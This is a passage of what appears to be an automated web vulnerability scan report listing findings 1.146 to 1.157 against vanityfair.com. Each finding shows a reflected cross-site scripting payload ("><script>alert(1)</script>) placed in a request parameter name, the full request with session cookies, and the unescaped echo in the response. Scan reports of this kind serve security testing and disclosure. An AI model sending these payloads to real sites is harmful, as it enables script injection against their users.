User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:32 GMT
Date: Mon, 29 Nov 2010 16:47:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/features/2010/12/walters-201012?printable=true&b32ea"><script>alert(1)</script>6089bdb47d2=1" title="Print this page">
...[SNIP]...

1.146. http://www.vanityfair.com/culture/features/incharacter-slideshow [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/features/incharacter-slideshow

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eebf"><script>alert(1)</script>9a07b0800cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/features/incharacter-slideshow?2eebf"><script>alert(1)</script>9a07b0800cf=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:46 GMT
Date: Mon, 29 Nov 2010 16:47:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106032


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/features/incharacter-slideshow?printable=true&2eebf"><script>alert(1)</script>9a07b0800cf=1" title="Print this page">
...[SNIP]...

1.147. http://www.vanityfair.com/culture/features/vanities-slideshow [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/features/vanities-slideshow

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf45b"><script>alert(1)</script>85d7e5c52b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/features/vanities-slideshow?bf45b"><script>alert(1)</script>85d7e5c52b1=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:37 GMT
Date: Mon, 29 Nov 2010 16:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/features/vanities-slideshow?printable=true&bf45b"><script>alert(1)</script>85d7e5c52b1=1" title="Print this page">
...[SNIP]...

1.148. http://www.vanityfair.com/culture/yearinreview/hubris-maximus-201012 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/yearinreview/hubris-maximus-201012

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b98"><script>alert(1)</script>cc9aceeffd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/yearinreview/hubris-maximus-201012?f4b98"><script>alert(1)</script>cc9aceeffd7=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:45 GMT
Date: Mon, 29 Nov 2010 16:47:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104546


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/yearinreview/hubris-maximus-201012?printable=true&f4b98"><script>alert(1)</script>cc9aceeffd7=1" title="Print this page">
...[SNIP]...

1.149. http://www.vanityfair.com/culture/yearinreview/year-in-photos-slide-show-201011 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/yearinreview/year-in-photos-slide-show-201011

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58d63"><script>alert(1)</script>cc3e346c8b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/yearinreview/year-in-photos-slide-show-201011?58d63"><script>alert(1)</script>cc3e346c8b0=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:43 GMT
Date: Mon, 29 Nov 2010 16:47:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/yearinreview/year-in-photos-slide-show-201011?printable=true&58d63"><script>alert(1)</script>cc3e346c8b0=1" title="Print this page">
...[SNIP]...

1.150. http://www.vanityfair.com/hollywood/features/2001/10/harry-potter-slide-show-200110 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /hollywood/features/2001/10/harry-potter-slide-show-200110

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27037"><script>alert(1)</script>9bfecb7b262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hollywood/features/2001/10/harry-potter-slide-show-200110?27037"><script>alert(1)</script>9bfecb7b262=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:44 GMT
Date: Mon, 29 Nov 2010 16:47:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/hollywood/features/2001/10/harry-potter-slide-show-200110?printable=true&27037"><script>alert(1)</script>9bfecb7b262=1" title="Print this page">
...[SNIP]...

1.151. http://www.vanityfair.com/hollywood/features/2010/11/industrial-light-and-magic-201011 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /hollywood/features/2010/11/industrial-light-and-magic-201011

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2ef9"><script>alert(1)</script>796bcab4165 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hollywood/features/2010/11/industrial-light-and-magic-201011?a2ef9"><script>alert(1)</script>796bcab4165=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:43 GMT
Date: Mon, 29 Nov 2010 16:47:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/hollywood/features/2010/11/industrial-light-and-magic-201011?printable=true&a2ef9"><script>alert(1)</script>796bcab4165=1" title="Print this page">
...[SNIP]...

1.152. http://www.vanityfair.com/hollywood/features/2010/12/cher-201012 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /hollywood/features/2010/12/cher-201012

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 618b7"><script>alert(1)</script>c32966ddacd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hollywood/features/2010/12/cher-201012?618b7"><script>alert(1)</script>c32966ddacd=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=299
Expires: Mon, 29 Nov 2010 16:52:45 GMT
Date: Mon, 29 Nov 2010 16:47:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107630


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/hollywood/features/2010/12/cher-201012?printable=true&618b7"><script>alert(1)</script>c32966ddacd=1" title="Print this page">
...[SNIP]...

1.153. http://www.vanityfair.com/hollywood/features/2010/12/cher-chutzpah-slide-show-201012 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /hollywood/features/2010/12/cher-chutzpah-slide-show-201012

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8818"><script>alert(1)</script>8b6d1b78a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hollywood/features/2010/12/cher-chutzpah-slide-show-201012?f8818"><script>alert(1)</script>8b6d1b78a5=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:43 GMT
Date: Mon, 29 Nov 2010 16:47:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/hollywood/features/2010/12/cher-chutzpah-slide-show-201012?printable=true&f8818"><script>alert(1)</script>8b6d1b78a5=1" title="Print this page">
...[SNIP]...

1.154. http://www.vanityfair.com/hollywood/features/2010/12/olivia-wilde-slide-show-201012 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /hollywood/features/2010/12/olivia-wilde-slide-show-201012

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75abb"><script>alert(1)</script>09eb7bc0433 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hollywood/features/2010/12/olivia-wilde-slide-show-201012?75abb"><script>alert(1)</script>09eb7bc0433=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:45 GMT
Date: Mon, 29 Nov 2010 16:47:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/hollywood/features/2010/12/olivia-wilde-slide-show-201012?printable=true&75abb"><script>alert(1)</script>09eb7bc0433=1" title="Print this page">
...[SNIP]...

1.155. http://www.vanityfair.com/magazine/2010/12/graydon-201012 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /magazine/2010/12/graydon-201012

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9afd"><script>alert(1)</script>c51e4e36716 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /magazine/2010/12/graydon-201012?f9afd"><script>alert(1)</script>c51e4e36716=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:54:38 GMT
Date: Mon, 29 Nov 2010 16:49:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 98925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/magazine/2010/12/graydon-201012?printable=true&f9afd"><script>alert(1)</script>c51e4e36716=1" title="Print this page">
...[SNIP]...

1.156. http://www.vanityfair.com/magazine/2011/01/60-minutes-poll-201101 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /magazine/2011/01/60-minutes-poll-201101

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9926"><script>alert(1)</script>80200d7a815 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /magazine/2011/01/60-minutes-poll-201101?a9926"><script>alert(1)</script>80200d7a815=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:54:38 GMT
Date: Mon, 29 Nov 2010 16:49:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100484


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/magazine/2011/01/60-minutes-poll-201101?printable=true&a9926"><script>alert(1)</script>80200d7a815=1" title="Print this page">
...[SNIP]...

1.157. http://www.vanityfair.com/magazine/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /magazine/search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c63ad"><script>alert(1)</script>d3d5348c07e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /magazine/search?c63ad"><script>alert(1)</script>d3d5348c07e=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
